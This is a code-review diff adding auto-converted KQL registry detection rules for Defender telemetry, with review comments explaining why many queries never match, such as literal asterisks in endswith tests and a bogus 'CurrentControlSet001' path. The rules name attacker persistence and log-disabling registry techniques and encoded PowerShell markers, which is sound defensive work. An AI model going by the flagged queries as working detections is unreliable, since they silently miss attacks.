diff --git a/KQL/rules/windows/registry/registry_set/registry_persistence_via_service_in_safe_mode.kql b/KQL/rules/windows/registry/registry_set/registry_persistence_via_service_in_safe_mode.kql new file mode 100644 index 00000000..4d45978d --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/registry_persistence_via_service_in_safe_mode.kql @@ -0,0 +1,10 @@ +// Title: Registry Persistence via Service in Safe Mode +// Author: frack113 +// Date: 2022-04-04 +// Level: high +// Description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.001 + +DeviceRegistryEvents +| where (RegistryValueData =~ "Service" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal*" or RegistryKey endswith "\\Control\\SafeBoot\\Network*") and RegistryKey endswith "\\(Default)") and (not(((RegistryValueData =~ "Service" and InitiatingProcessFolderPath =~ "C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\Hexnode Updater\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\Hexnode Updater\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\Hexnode Agent\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\Hexnode Agent\\(Default)")) or (RegistryValueData =~ "Service" and InitiatingProcessFolderPath endswith "\\MBAMInstallerService.exe" and RegistryKey endswith "\\MBAMService\\(Default)") or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\SAVService\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\SAVService\\(Default)"))))) \ No newline at end of file 
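Review bot: The main condition of this high-level rule cannot be satisfied: `RegistryKey endswith "\\Control\\SafeBoot\\Minimal*"` requires the key to end in a literal asterisk (KQL `endswith` has no wildcards) while the same key must also `endswith "\\(Default)"`, so the query is dead on arrival. The path part should be a substring test, `(RegistryKey contains "\\Control\\SafeBoot\\Minimal\\" or RegistryKey contains "\\Control\\SafeBoot\\Network\\")`, and the `\\(Default)` suffix dropped; if the default-value restriction is wanted it belongs on `RegistryValueName` (presumably empty for the default value in MDE — confirm). The Hexnode, Malwarebytes and Sophos exclusions carry the same `\\(Default)` suffix and need the same adjustment or they will stop filtering once the main condition is fixed.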
diff --git a/KQL/rules/windows/registry/registry_set/restrictedadminmode_registry_value_tampering.kql b/KQL/rules/windows/registry/registry_set/restrictedadminmode_registry_value_tampering.kql
new file mode 100644
index 00000000..e75d715f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/restrictedadminmode_registry_value_tampering.kql
@@ -0,0 +1,12 @@
+// Title: RestrictedAdminMode Registry Value Tampering
+// Author: frack113
+// Date: 2023-01-13
+// Level: high
+// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
+// RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
+// This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql b/KQL/rules/windows/registry/registry_set/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql
new file mode 100644
index 00000000..6f0b3b69
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql
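Review bot: `RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin"` folds the value name into the key path, which is how Sysmon's TargetObject looks but not how DeviceRegistryEvents reports it (value name in `RegistryValueName`, key path in `RegistryKey`), so this high-level rule is unlikely to fire. `CurrentControlSet` is also a symbolic link and the telemetry may surface the concrete `ControlSet001` path instead; anchoring on the tail of the key avoids depending on that. A form that matches the intent (any write to the value, enabling or disabling) is `RegistryKey endswith "\\Control\\Lsa" and RegistryValueName =~ "DisableRestrictedAdmin"`; verify both points against a real event from a test host.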
@@ -0,0 +1,10 @@ +// Title: Running Chrome VPN Extensions via the Registry 2 VPN Extension +// Author: frack113 +// Date: 2021-12-28 +// Level: high +// Description: Running Chrome VPN Extensions via the Registry install 2 vpn extension +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.persistence, attack.t1133 + +DeviceRegistryEvents +| where (RegistryKey contains "Software\\Wow6432Node\\Google\\Chrome\\Extensions" and RegistryKey endswith "update_url") and (RegistryKey contains "fdcgdnkidjaadafnichfpabhfomcebme" or RegistryKey contains "fcfhplploccackoneaefokcmbjfbkenj" or RegistryKey contains "bihmplhobchoageeokmgbdihknkjbknd" or RegistryKey contains "gkojfkhlekighikafcpjkiklfbnlmeio" or RegistryKey contains "jajilbjjinjmgcibalaakngmkilboobh" or RegistryKey contains "gjknjjomckknofjidppipffbpoekiipm" or RegistryKey contains "nabbmpekekjknlbkgpodfndbodhijjem" or RegistryKey contains "kpiecbcckbofpmkkkdibbllpinceiihk" or RegistryKey contains "nlbejmccbhkncgokjcmghpfloaajcffj" or RegistryKey contains "omghfjlpggmjjaagoclmmobgdodcjboh" or RegistryKey contains "bibjcjfmgapbfoljiojpipaooddpkpai" or RegistryKey contains "mpcaainmfjjigeicjnlkdfajbioopjko" or RegistryKey contains "jljopmgdobloagejpohpldgkiellmfnc" or RegistryKey contains "lochiccbgeohimldjooaakjllnafhaid" or RegistryKey contains "nhnfcgpcbfclhfafjlooihdfghaeinfc" or RegistryKey contains "ookhnhpkphagefgdiemllfajmkdkcaim" or RegistryKey contains "namfblliamklmeodpcelkokjbffgmeoo" or RegistryKey contains "nbcojefnccbanplpoffopkoepjmhgdgh" or RegistryKey contains "majdfhpaihoncoakbjgbdhglocklcgno" or RegistryKey contains "lnfdmdhmfbimhhpaeocncdlhiodoblbd" or RegistryKey contains "eppiocemhmnlbhjplcgkofciiegomcon" or RegistryKey contains "cocfojppfigjeefejbpfmedgjbpchcng" or RegistryKey contains "foiopecknacmiihiocgdjgbjokkpkohc" or RegistryKey contains "hhdobjgopfphlmjbmnpglhfcgppchgje" or RegistryKey contains "jgbaghohigdbgbolncodkdlpenhcmcge" or RegistryKey contains 
"inligpkjkhbpifecbdjhmdpcfhnlelja" or RegistryKey contains "higioemojdadgdbhbbbkfbebbdlfjbip" or RegistryKey contains "hipncndjamdcmphkgngojegjblibadbe" or RegistryKey contains "iolonopooapdagdemdoaihahlfkncfgg" or RegistryKey contains "nhfjkakglbnnpkpldhjmpmmfefifedcj" or RegistryKey contains "jpgljfpmoofbmlieejglhonfofmahini" or RegistryKey contains "fgddmllnllkalaagkghckoinaemmogpe" or RegistryKey contains "ejkaocphofnobjdedneohbbiilggdlbi" or RegistryKey contains "keodbianoliadkoelloecbhllnpiocoi" or RegistryKey contains "hoapmlpnmpaehilehggglehfdlnoegck" or RegistryKey contains "poeojclicodamonabcabmapamjkkmnnk" or RegistryKey contains "dfkdflfgjdajbhocmfjolpjbebdkcjog" or RegistryKey contains "kcdahmgmaagjhocpipbodaokikjkampi" or RegistryKey contains "klnkiajpmpkkkgpgbogmcgfjhdoljacg" or RegistryKey contains "lneaocagcijjdpkcabeanfpdbmapcjjg" or RegistryKey contains "pgfpignfckbloagkfnamnolkeaecfgfh" or RegistryKey contains "jplnlifepflhkbkgonidnobkakhmpnmh" or RegistryKey contains "jliodmnojccaloajphkingdnpljdhdok" or RegistryKey contains "hnmpcagpplmpfojmgmnngilcnanddlhb" or RegistryKey contains "ffbkglfijbcbgblgflchnbphjdllaogb" or RegistryKey contains "kcndmbbelllkmioekdagahekgimemejo" or RegistryKey contains "jdgilggpfmjpbodmhndmhojklgfdlhob" or RegistryKey contains "bihhflimonbpcfagfadcnbbdngpopnjb" or RegistryKey contains "ppajinakbfocjfnijggfndbdmjggcmde" or RegistryKey contains "oofgbpoabipfcfjapgnbbjjaenockbdp" or RegistryKey contains "bhnhkdgoefpmekcgnccpnhjfdgicfebm" or RegistryKey contains "knmmpciebaoojcpjjoeonlcjacjopcpf" or RegistryKey contains "dhadilbmmjiooceioladdphemaliiobo" or RegistryKey contains "jedieiamjmoflcknjdjhpieklepfglin" or RegistryKey contains "mhngpdlhojliikfknhfaglpnddniijfh" or RegistryKey contains "omdakjcmkglenbhjadbccaookpfjihpa" or RegistryKey contains "npgimkapccfidfkfoklhpkgmhgfejhbj" or RegistryKey contains "akeehkgglkmpapdnanoochpfmeghfdln" or RegistryKey contains "gbmdmipapolaohpinhblmcnpmmlgfgje" or RegistryKey 
contains "aigmfoeogfnljhnofglledbhhfegannp" or RegistryKey contains "cgojmfochfikphincbhokimmmjenhhgk" or RegistryKey contains "ficajfeojakddincjafebjmfiefcmanc" or RegistryKey contains "ifnaibldjfdmaipaddffmgcmekjhiloa" or RegistryKey contains "jbnmpdkcfkochpanomnkhnafobppmccn" or RegistryKey contains "apcfdffemoinopelidncddjbhkiblecc" or RegistryKey contains "mjolnodfokkkaichkcjipfgblbfgojpa" or RegistryKey contains "oifjbnnafapeiknapihcmpeodaeblbkn" or RegistryKey contains "plpmggfglncceinmilojdkiijhmajkjh" or RegistryKey contains "mjnbclmflcpookeapghfhapeffmpodij" or RegistryKey contains "bblcccknbdbplgmdjnnikffefhdlobhp" or RegistryKey contains "aojlhgbkmkahabcmcpifbolnoichfeep" or RegistryKey contains "lcmammnjlbmlbcaniggmlejfjpjagiia" or RegistryKey contains "knajdeaocbpmfghhmijicidfcmdgbdpm" or RegistryKey contains "bdlcnpceagnkjnjlbbbcepohejbheilk" or RegistryKey contains "edknjdjielmpdlnllkdmaghlbpnmjmgb" or RegistryKey contains "eidnihaadmmancegllknfbliaijfmkgo" or RegistryKey contains "ckiahbcmlmkpfiijecbpflfahoimklke" or RegistryKey contains "macdlemfnignjhclfcfichcdhiomgjjb" or RegistryKey contains "chioafkonnhbpajpengbalkececleldf" or RegistryKey contains "amnoibeflfphhplmckdbiajkjaoomgnj" or RegistryKey contains "llbhddikeonkpbhpncnhialfbpnilcnc" or RegistryKey contains "pcienlhnoficegnepejpfiklggkioccm" or RegistryKey contains "iocnglnmfkgfedpcemdflhkchokkfeii" or RegistryKey contains "igahhbkcppaollcjeaaoapkijbnphfhb" or RegistryKey contains "njpmifchgidinihmijhcfpbdmglecdlb" or RegistryKey contains "ggackgngljinccllcmbgnpgpllcjepgc" or RegistryKey contains "kchocjcihdgkoplngjemhpplmmloanja" or RegistryKey contains "bnijmipndnicefcdbhgcjoognndbgkep" or RegistryKey contains "lklekjodgannjcccdlbicoamibgbdnmi" or RegistryKey contains "dbdbnchagbkhknegmhgikkleoogjcfge" or RegistryKey contains "egblhcjfjmbjajhjhpmnlekffgaemgfh" or RegistryKey contains "ehbhfpfdkmhcpaehaooegfdflljcnfec" or RegistryKey contains "bkkgdjpomdnfemhhkalfkogckjdkcjkg" or 
RegistryKey contains "almalgbpmcfpdaopimbdchdliminoign" or RegistryKey contains "akkbkhnikoeojlhiiomohpdnkhbkhieh" or RegistryKey contains "gbfgfbopcfokdpkdigfmoeaajfmpkbnh" or RegistryKey contains "bniikohfmajhdcffljgfeiklcbgffppl" or RegistryKey contains "lejgfmmlngaigdmmikblappdafcmkndb" or RegistryKey contains "ffhhkmlgedgcliajaedapkdfigdobcif" or RegistryKey contains "gcknhkkoolaabfmlnjonogaaifnjlfnp" or RegistryKey contains "pooljnboifbodgifngpppfklhifechoe" or RegistryKey contains "fjoaledfpmneenckfbpdfhkmimnjocfa" or RegistryKey contains "aakchaleigkohafkfjfjbblobjifikek" or RegistryKey contains "dpplabbmogkhghncfbfdeeokoefdjegm" or RegistryKey contains "padekgcemlokbadohgkifijomclgjgif" or RegistryKey contains "bfidboloedlamgdmenmlbipfnccokknp") \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/scheduled_taskcache_change_by_uncommon_program.kql b/KQL/rules/windows/registry/registry_set/scheduled_taskcache_change_by_uncommon_program.kql new file mode 100644 index 00000000..8358e184 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/scheduled_taskcache_change_by_uncommon_program.kql 
@@ -0,0 +1,10 @@ +// Title: Scheduled TaskCache Change by Uncommon Program +// Author: Syed Hasan (@syedhasan009) +// Date: 2021-06-18 +// Level: high +// Description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053, attack.t1053.005 + +DeviceRegistryEvents +| where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache*" and (not((RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor*") or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\MoUsoCoreWorker.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe" or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework" and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN")) or isnull(RegistryValueData) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\Integration\\Integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\Integration\\Integrator.exe", "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe", "C:\\Program Files (x86)\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe")) or (RegistryKey contains "Microsoft\\Windows\\UpdateOrchestrator" or RegistryKey contains "Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\\Index" or 
RegistryKey contains "Microsoft\\Windows\\Flighting\\OneSettings\\RefreshCache\\Index") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\services.exe" or InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe" or InitiatingProcessFolderPath =~ "System" or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\")))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Dropbox\\Update\\DropboxUpdate.exe", "C:\\Program Files\\Dropbox\\Update\\DropboxUpdate.exe")) or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe") or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe")))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/screensaver_registry_key_set.kql b/KQL/rules/windows/registry/registry_set/screensaver_registry_key_set.kql new file mode 100644 index 00000000..5f65fc7f --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/screensaver_registry_key_set.kql 
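Review bot: The positive condition `RegistryKey endswith "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache*"` requires the key path to end in a literal `*`, so this high-level rule never matches and the long exclusion list is moot. Replace it with `RegistryKey contains "\\Schedule\\TaskCache\\"`; the explorer.exe exclusion has the same defect in `...\\PLA\\Server Manager Performance Monitor*` and should become a `contains` (or `startswith` on the suffix after the fix). Also worth a second look: `InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\MoUsoCoreWorker.exe"` and the similar `endswith "C:\\Windows\\System32\\services.exe"` are full paths used as suffixes, which works only by accident and would be clearer as `=~`.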
@@ -0,0 +1,12 @@ +// Title: ScreenSaver Registry Key Set +// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk) +// Date: 2022-05-04 +// Level: medium +// Description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 +// False Positives: +// - Legitimate use of screen saver + +DeviceRegistryEvents +| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (RegistryValueData endswith ".scr" and RegistryKey contains "\\Control Panel\\Desktop\\SCRNSAVE.EXE") and (not((RegistryValueData contains "C:\\Windows\\System32\\" or RegistryValueData contains "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/scripted_diagnostics_turn_off_check_enabled_registry.kql b/KQL/rules/windows/registry/registry_set/scripted_diagnostics_turn_off_check_enabled_registry.kql new file mode 100644 index 00000000..3ee13923 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/scripted_diagnostics_turn_off_check_enabled_registry.kql @@ -0,0 +1,12 @@ +// Title: Scripted Diagnostics Turn Off Check Enabled - Registry +// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io +// Date: 2022-06-15 +// Level: medium +// Description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Administrator actions + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\ScriptedDiagnostics\\TurnOffCheck" \ No newline at end of file 
diff --git a/KQL/rules/windows/registry/registry_set/security_event_logging_disabled_via_minint_registry_key_registry_set.kql b/KQL/rules/windows/registry/registry_set/security_event_logging_disabled_via_minint_registry_key_registry_set.kql
new file mode 100644
index 00000000..68a7bdb7
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/security_event_logging_disabled_via_minint_registry_key_registry_set.kql
@@ -0,0 +1,14 @@
+// Title: Security Event Logging Disabled via MiniNt Registry Key - Registry Set
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-09
+// Level: high
+// Description: Detects the addition of the 'MiniNt' key to the registry. Upon a reboot, Windows Event Log service will stop writing events.
+// Windows Event Log is a service that collects and stores event logs from the operating system and applications. It is an important component of Windows security and auditing.
+// Adversary may want to disable this service to disable logging of security events which could be used to detect their activities.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001
+// False Positives:
+// - Highly Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\MiniNt\\(Default)"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/service_binary_in_suspicious_folder.kql b/KQL/rules/windows/registry/registry_set/service_binary_in_suspicious_folder.kql
new file mode 100644
index 00000000..55e28560
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/service_binary_in_suspicious_folder.kql
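Review bot: The exact match `RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\MiniNt\\(Default)"` will not fire on any real event: `CurrentControlSet001` is neither the `CurrentControlSet` alias nor the concrete `ControlSet001` hive name and looks like a string-replacement artifact in the converter, and `\\(Default)` is a value-name placeholder appended to a key path. Given the rule is high severity with "Highly Unlikely" false positives, a dead query here is a silent coverage gap for event-log tampering. `RegistryKey endswith "\\Control\\MiniNt"` captures the key creation the description talks about regardless of which control set the sensor reports; if the default value specifically is wanted, test `RegistryValueName` rather than the key path.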
@@ -0,0 +1,10 @@ +// Title: Service Binary in Suspicious Folder +// Author: Florian Roth (Nextron Systems), frack113 +// Date: 2022-05-02 +// Level: high +// Description: Detect the creation of a service with a service binary located in a suspicious directory +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where (((RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Perflogs\\" or RegistryValueData contains "\\ADMIN$\\" or RegistryValueData contains "\\Temp\\") and RegistryKey endswith "\\ImagePath" and RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services*") or ((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "DWORD (0x00000002)")) and (InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Perflogs\\" or InitiatingProcessFolderPath contains "\\ADMIN$\\" or InitiatingProcessFolderPath contains "\\Temp\\") and RegistryKey endswith "\\Start" and RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services*")) and (not(((InitiatingProcessFolderPath contains "\\Common Files\\" and InitiatingProcessFolderPath contains "\\Temp\\") or (RegistryValueData endswith "\\AppData\\Local\\Temp\\MBAMInstallerService.exe\"" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\services.exe" and RegistryKey endswith "\\CurrentControlSet\\Services\\MBAMInstallerService\\ImagePath")))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/servicedll_hijack.kql b/KQL/rules/windows/registry/registry_set/servicedll_hijack.kql new file mode 100644 index 00000000..372f8f5f --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/servicedll_hijack.kql 
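Review bot: Both branches of the `where` clause require `RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services*"`, an exact comparison against a string ending in a literal asterisk, while the same key must also `endswith "\\ImagePath"` or `"\\Start"`; these cannot all be true, so this high-level rule never returns rows. The scope test should be `RegistryKey startswith "HKEY_LOCAL_MACHINE\\SYSTEM\\" and RegistryKey contains "\\Services\\"`, which also sidesteps the `CurrentControlSet001` vs `CurrentControlSet` inconsistency visible between the main condition and the MBAMInstallerService exclusion. As with the other registry_set rules in this PR, `ImagePath` and `Start` are value names and most likely need to be matched on `RegistryValueName` in MDE — confirm with a sample service-install event.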
@@ -0,0 +1,14 @@ +// Title: ServiceDll Hijack +// Author: frack113 +// Date: 2022-02-04 +// Level: medium +// Description: Detects changes to the "ServiceDLL" value related to a service in the registry. +// This is often used as a method of persistence. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 +// False Positives: +// - Administrative scripts +// - Installation of a service + +DeviceRegistryEvents +| where ((RegistryKey endswith "\\System*" and RegistryKey contains "ControlSet" and RegistryKey endswith "\\Services*") and RegistryKey endswith "\\Parameters\\ServiceDll") and (not(((RegistryValueData =~ "%%systemroot%%\\system32\\ntdsa.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe" and RegistryKey endswith "\\Services\\NTDS\\Parameters\\ServiceDll") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or RegistryValueData =~ "C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll"))) and (not((RegistryValueData =~ "C:\\Windows\\System32\\STAgent.dll" and InitiatingProcessFolderPath endswith "\\regsvr32.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/session_manager_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/session_manager_autorun_keys_modification.kql new file mode 100644 index 00000000..1a5cf50c --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/session_manager_autorun_keys_modification.kql 
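Review bot: The scoping clause `RegistryKey endswith "\\System*" and RegistryKey contains "ControlSet" and RegistryKey endswith "\\Services*"` asks one string to end with three different suffixes (two of them containing a literal `*`), so the conjunction with `endswith "\\Parameters\\ServiceDll"` is always false and the rule is dead. The intended Sigma wildcards translate to substring tests: `RegistryKey contains "\\System\\" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Services\\" and RegistryKey endswith "\\Parameters\\ServiceDll"`. Note that the hand-written Sigma2KQL rule this PR deletes elsewhere used `contains`/`endswith` without embedded asterisks, so the regression is in the generator's wildcard handling and will reappear on the next scheduled run unless fixed there.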
@@ -0,0 +1,13 @@ +// Title: Session Manager Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, attack.t1546.009 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where RegistryKey contains "\\System\\CurrentControlSet\\Control\\Session Manager" and (RegistryKey contains "\\SetupExecute" or RegistryKey contains "\\S0InitialCommand" or RegistryKey contains "\\KnownDlls" or RegistryKey contains "\\Execute" or RegistryKey contains "\\BootExecute" or RegistryKey contains "\\AppCertDlls") and (not(RegistryValueData =~ "(Empty)")) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/suspicious_application_allowed_through_exploit_guard.kql b/KQL/rules/windows/registry/registry_set/suspicious_application_allowed_through_exploit_guard.kql new file mode 100644 index 00000000..23296f4e --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/suspicious_application_allowed_through_exploit_guard.kql 
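Review bot: The exclusion `not(RegistryValueData =~ "(Empty)")` reproduces Sysmon's rendering of an empty value; DeviceRegistryEvents does not, to my knowledge, use that sentinel (an empty value is reported as an empty string and deletions as their own ActionType), so the filter is probably a no-op here and empty or deleted values under these keys would alert. Suggest `not(isempty(RegistryValueData))` and a check against one known event.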
@@ -0,0 +1,12 @@ +// Title: Suspicious Application Allowed Through Exploit Guard +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-05 +// Level: high +// Description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\AllowedApplications" and (RegistryKey endswith "\\Users\\Public*" or RegistryKey endswith "\\AppData\\Local\\Temp*" or RegistryKey endswith "\\Desktop*" or RegistryKey endswith "\\PerfLogs*" or RegistryKey endswith "\\Windows\\Temp*") \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/suspicious_environment_variable_has_been_registered.kql b/KQL/rules/windows/registry/registry_set/suspicious_environment_variable_has_been_registered.kql new file mode 100644 index 00000000..b9fae231 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/suspicious_environment_variable_has_been_registered.kql 
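Review bot: The path conditions `RegistryKey endswith "\\Users\\Public*"`, `"\\AppData\\Local\\Temp*"` and the rest contain a literal `*`, so an allowed-application entry such as `...\\AllowedApplications\\C:\\Users\\Public\\x.exe` never matches and the rule is dead. Each should be a `contains` test on the directory fragment, e.g. `RegistryKey contains "\\Users\\Public\\"`, since the application path is a component of the key rather than its suffix. Also confirm whether the path lands in `RegistryKey` or `RegistryValueName` in this table; if the latter, the `contains` tests must target that column.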
@@ -0,0 +1,10 @@ +// Title: Suspicious Environment Variable Has Been Registered +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-20 +// Level: high +// Description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence + +DeviceRegistryEvents +| where ((RegistryValueData in~ ("powershell", "pwsh")) or (RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Users\\Public\\" or RegistryValueData contains "TVqQAAMAAAAEAAAA" or RegistryValueData contains "TVpQAAIAAAAEAA8A" or RegistryValueData contains "TVqAAAEAAAAEABAA" or RegistryValueData contains "TVoAAAAAAAAAAAAA" or RegistryValueData contains "TVpTAQEAAAAEAAAA" or RegistryValueData contains "SW52b2tlL" or RegistryValueData contains "ludm9rZS" or RegistryValueData contains "JbnZva2Ut" or RegistryValueData contains "SQBuAHYAbwBrAGUALQ" or RegistryValueData contains "kAbgB2AG8AawBlAC0A" or RegistryValueData contains "JAG4AdgBvAGsAZQAtA") or (RegistryValueData startswith "SUVY" or RegistryValueData startswith "SQBFAF" or RegistryValueData startswith "SQBuAH" or RegistryValueData startswith "cwBhA" or RegistryValueData startswith "aWV4" or RegistryValueData startswith "aQBlA" or RegistryValueData startswith "R2V0" or RegistryValueData startswith "dmFy" or RegistryValueData startswith "dgBhA" or RegistryValueData startswith "dXNpbm" or RegistryValueData startswith "H4sIA" or RegistryValueData startswith "Y21k" or RegistryValueData startswith "cABhAH" or RegistryValueData startswith "Qzpc" or RegistryValueData startswith "Yzpc")) and RegistryKey endswith "\\Environment*" \ No newline at end of file 
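Review bot: `RegistryKey endswith "\\Environment*"` can never be true because `*` is a literal character in KQL `endswith`, so this rule matches nothing. The user and system environment keys end in `\\Environment` with the variable name carried separately, so `RegistryKey endswith "\\Environment"` is the faithful form (or `contains "\\Environment\\"` if the value name turns out to be appended to `RegistryKey` in this data). The base64 prefix heuristics themselves look fine.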
